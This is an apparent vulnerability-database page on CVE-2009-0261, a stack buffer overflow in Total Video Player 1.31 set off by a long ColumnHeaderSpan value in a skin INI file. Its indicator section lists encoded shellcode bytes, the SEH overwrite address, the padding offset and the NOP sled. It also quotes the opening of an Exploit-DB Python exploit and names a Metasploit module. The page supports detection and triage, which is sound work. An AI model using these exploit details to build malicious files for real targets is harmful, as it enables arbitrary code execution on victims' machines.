CVE-2009-0261
Published 2009-01-23
Priority P3 43 · critical 9.3 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit available (see the Exploit-DB and Metasploit entries below)
EPSS: 13.21% (95.9th percentile)
Stack-based buffer overflow in EffectMatrix Total Video Player 1.31 allows user-assisted attackers to execute arbitrary code via a Skins\DefaultSkin\DefaultSkin.ini file with a large ColumnHeaderSpan value.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| effectmatrix | total_video_player | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd5\xc5\x35\xef\x83\xeb\xfc\xe2\xf4\x29\x2d\x71\xef\xd5\xc5\xbe\xaa\xe9\x4e\x49\xea\xad\xc4\xda\x64\x9a\xdd\xbe\xb0\xf5\xc4\xde\xa6\x5e\xf1\xbe\xee\x3b\xf4\xf5\x76\x79\x41\xf5\x9b\xd2\x04\xff\xe2\xd4\x07\xde\x1b\xee\x91\x11\xeb\xa0\x20\xbe\xb0\xf1\xc4\xde\x89\x5e\xc9\x7e\x64\x8a\xd9\x34\x04\x5e\xd9\xbe\xee\x3e\x4c\x69\xcb\xd1\x06\x04\x2f\xb1\x4e\x75\xdf\x50\x05\x4d\xe3\x5e\x85\x39\x64\xa5\xd9\x98\x64\xbd\xcd\xde\xe6\x5e\x45\x85\xef\xd5\xc5\xbe\x87\xe9\x9a\x04\x19\xb5\x93\xbc\x17\x56\x05\x4e\xbf\xbd\x35\xbf\xeb\x8a\xad\xad\x11\x5f\xcb\x62\x10\x32\xa6\x54\x83\xb6\xc5\x35\xef
- bytes: \x7C\xE1\xA7\x7C (the SEH overwrite address 0x7CA7E17C in little-endian byte order)
- Trigger condition is a large `ColumnHeaderSpan` value in the INI file; look for an abnormally long (>221 bytes) `ColumnHeaderSpan` field in DefaultSkin.ini or Settings.ini.
- Exploit buffer structure: 221 bytes of 0x41 padding followed by the SEH overwrite address 0x7CA7E17C; detect this byte pattern in INI files opened by Total Video Player.
- The exploit is a SEH-based buffer overflow (EXITFUNC=seh); monitor for SEH chain corruption in the Total Video Player process (TVPlayer.exe or similar) when it parses INI files.
- A NOP sled of 20 bytes (0x90) precedes the shellcode; a NOP sled plus a shellcode blob inside a .ini file is a strong indicator of an exploitation attempt.
- The exploit was tested on Windows XP Pro SP2, Windows XP SP3, Windows 7, and Windows 8; the hardcoded SEH overwrite address (0x7CA7E17C) is platform/module-specific and may not apply to all OS versions.
- The vulnerability is user-assisted (a local file-format exploit); exploitation requires the victim to open a maliciously crafted DefaultSkin.ini or Settings.ini file with Total Video Player 1.31.
No detection rules found.
Exploit-DB
Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow
Exploit-DB · 2009-01-20 · CVE-2009-0261
---
```python
#!/usr/bin/python
import socket
print "******************************************************"
print " Total Video Player V1.31 Local Stack Overflow\n"
print " Author: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print " dz-secure.com\n snakespc.com\n dz-security.net"
print "******************************************************"
header1 = (
"\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0A\x50\x6C\x69\x73\x74\x57"
"\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C"
"\x49\x44\x0A\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53"
"\x43\x52\x45\x45\x4E\x5D\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61"
"\x6C\x2E\x62\x6D\x70\x0A\x0A\x5B\x50\x6C
```
Metasploit
Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability occurs when opening a malformed Settings.ini file, e.g. from "C:\Program Files\Total Video Player\". This module has been tested successfully on Windows XP SP3 EN, Windows 7, and Windows 8.
No writeups or analysis indexed.